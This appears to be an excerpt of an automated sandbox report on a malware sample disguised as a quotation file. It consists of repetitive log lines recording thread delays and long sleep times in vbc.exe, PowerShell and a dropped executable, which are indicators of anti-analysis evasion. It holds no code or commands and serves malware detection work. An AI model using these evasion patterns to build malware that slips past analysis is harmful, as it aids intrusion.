                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595841Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594853Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599452
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598795
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598576
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597479
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597022
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596465
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596121
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594578
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6959Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2590Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4208Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 5650Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 2856
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 6995
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe TID: 2972Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7008Thread sleep count: 4208 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7008Thread sleep count: 5650 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -599671s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -599343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -599015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -598796s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -598468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -598359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -598250s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -598140s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -598031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -597921s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -597812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -597703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -597593s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -597484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -597374s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -597265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -597156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -597047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -596937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -596828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -596718s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -596609s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -596500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -596390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -596281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -596171s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -596062s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -595952s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -595841s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -595734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -595624s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -595515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -595406s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -595296s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -595187s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -595077s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -594968s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -594853s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -594750s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5256Thread sleep time: -594640s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe TID: 7024Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -26747778906878833s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7080Thread sleep count: 2856 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -599890s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7080Thread sleep count: 6995 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -599781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -599671s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -599562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -599452s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -599343s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -599234s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -599124s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -599015s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -598906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -598795s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -598687s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -598576s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -598468s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -598359s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -598249s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -598140s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -598031s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -597921s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -597810s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -597703s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -597593s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -597479s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -597359s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -597249s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -597140s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -597022s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -596906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -596796s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -596687s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -596578s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -596465s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -596343s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -596234s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -596121s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -596000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -595890s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -595780s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -595671s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -595562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -595453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -595343s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -595234s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -595124s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -595015s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -594906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -594796s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -594687s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3284Thread sleep time: -594578s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596718Jump to behavior
